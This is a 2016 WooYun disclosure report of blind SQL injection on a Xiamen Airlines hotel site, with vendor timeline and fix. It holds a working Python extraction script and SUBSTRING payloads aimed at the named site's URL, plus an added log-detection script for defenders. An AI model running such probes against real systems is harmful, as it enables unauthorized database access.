
Vulnerability summary

Defect ID: wooyun-2016-0186144

Title: Blind SQL injection on a Xiamen Airlines site (verification script attached)

Affected vendor: xiamenair.com

Author: Blcat

Submitted: 2016-03-18 12:34

Fixed: 2016-05-05 10:12

Published: 2016-05-05 10:12

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-03-18: Details sent to the vendor, awaiting vendor response
2016-03-21: Vendor confirmed; details disclosed to the vendor only
2016-03-31: Details disclosed to core white hats and relevant domain experts
2016-04-10: Details disclosed to regular white hats
2016-04-20: Details disclosed to intern white hats
2016-05-05: Details disclosed to the public

Brief description:

I have always felt Xiamen Airlines is a conscientious airline, because I get coconut juice on every flight, heh.

Detailed description:

Injection point:

http://www.xmairhotels.com/admin/ImageShow.asp?imgKey=20100119155428


The injectable parameter is imgKey.
However, keywords are filtered, and both Safedog and 360webscan are installed; I wonder why they installed the whole "family bucket" of security products.
Verification script:

#!/usr/bin/env python
# coding: UTF-8 (๑•̀ㅂ•́)و✧
__author__ = 'T1m0n'
# Boolean-based blind probe, for example:
# http://www.xmairhotels.com/admin/ImageShow.asp?imgKey=20100119155428' AND SUBSTRING(@@version,1,1)='i' and '1'='1
import httplib  # Python 2 script (httplib, xrange, print statement)

headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'User-Agent': 'Mozilla / 5.0(WindowsNT6.3;Win64;x64;rv:44.0) Gecko / 20100101Firefox / 44.0',
    'Host': 'www.xmairhotels.com'
}
# db = []
# '*' is deliberately last: reaching it means no character matched at this position
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.-*'
for db_number in range(0, 185):
    db_name = ''
    flag = True
    for i in xrange(1, 29):  # at most 28 characters per database name
        if flag:
            for payload in payloads:
                poc = "SUBSTRING(db_name(%d),%d,1)='%s'" % (db_number, i, payload)
                url = "/admin/ImageShow.asp?imgKey=20100119155428%27%20AND%20" + poc + "%20and%20%271%27=%271"
                conn = httplib.HTTPConnection('www.xmairhotels.com')
                conn.request('GET', url, None, headers)
                text = conn.getresponse().read()
                conn.close()
                print '.',
                if len(text) > 224:  # a longer response body means the condition was true
                    print payload
                    db_name += payload
                    break
                if payload == '*':  # alphabet exhausted: this name is complete
                    flag = False
    print db_name
    with open('db_name.txt', 'a+') as file:
        file.write(db_name + '\n')
print 'Down'


Proof of vulnerability:

@@version

# version microsoftsqlserver2000


db_name(): 185 tables in total. Hopefully these are not hotel check-in records; scary, very scary.


Fix recommendation:

Stop installing the whole family bucket of security products; fix the code and do the filtering there instead.
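As an added, defender-side example (not part of the original report and not the verification script above), the following Python 3 code flags the boolean-based blind probes this report describes in IIS W3C log lines: a closing quote followed by AND SUBSTRING over db_name() or @@version, in an imgKey parameter that should only ever be numeric. It also reports the distinct response sizes, which are the true/false oracle the script relies on. The log lines, client IPs and byte counts are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status sc-bytes).
# The first and last lines are ordinary requests; the middle three mirror the probe shape from this report.
SAMPLE_LOG = """\
2016-03-18 12:31:02 203.0.113.7 GET /admin/ImageShow.asp imgKey=20100119155428 200 612
2016-03-18 12:31:03 203.0.113.7 GET /admin/ImageShow.asp imgKey=20100119155428%27%20AND%20SUBSTRING(db_name(0),1,1)=%27a%27%20and%20%271%27=%271 200 190
2016-03-18 12:31:03 203.0.113.7 GET /admin/ImageShow.asp imgKey=20100119155428%27%20AND%20SUBSTRING(db_name(0),1,1)=%27b%27%20and%20%271%27=%271 200 190
2016-03-18 12:31:04 203.0.113.7 GET /admin/ImageShow.asp imgKey=20100119155428%27%20AND%20SUBSTRING(@@version,1,1)=%27M%27%20and%20%271%27=%271 200 612
2016-03-18 12:31:05 198.51.100.2 GET /admin/ImageShow.asp imgKey=20100119155500 200 611
"""

# Probe shape seen in this report: quote, AND, SUBSTRING( over db_name( or @@version.
BLIND_SQLI = re.compile(r"'\s*AND\s+SUBSTRING\s*\(\s*(db_name\s*\(|@@version)", re.IGNORECASE)
# Legitimate imgKey values are purely numeric; this is the allowlist the application itself should enforce.
NUMERIC_ONLY = re.compile(r"^\d+$")


def parse_line(line):
    """Split one W3C log line into the fields the detector needs; the query is URL-decoded once."""
    _date, _time, ip, _method, stem, query, _status, sbytes = line.split()
    return {"ip": ip, "stem": stem, "query": unquote_plus(query), "bytes": int(sbytes)}


def is_blind_probe(entry):
    """True when imgKey is non-numeric and carries the boolean-blind probe pattern."""
    m = re.search(r"imgKey=([^&]*)", entry["query"])
    if not m:
        return False
    value = m.group(1)
    return NUMERIC_ONLY.match(value) is None and BLIND_SQLI.search(value) is not None


def analyse(log_text):
    """Count probes per client IP and collect the response sizes that act as the true/false oracle."""
    probes = [e for e in map(parse_line, log_text.splitlines()) if is_blind_probe(e)]
    return {
        "probe_count": len(probes),
        "by_ip": dict(Counter(e["ip"] for e in probes)),
        "response_sizes": sorted({e["bytes"] for e in probes}),
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

Two distinct response sizes across many near-identical requests from one client is the character-by-character extraction signature; the same numeric allowlist applied server-side to imgKey removes the injection regardless of which WAF products sit in front of the page.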

Copyright notice: when reposting, please credit the source: Blcat@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2016-03-21 10:12

Vendor comment:

Thank you for supporting Xiamen Airlines' information security work.

Latest status:

2016-03-21: Thank you for your attention to Xiamen Airlines' information security; the vulnerability has now been remediated.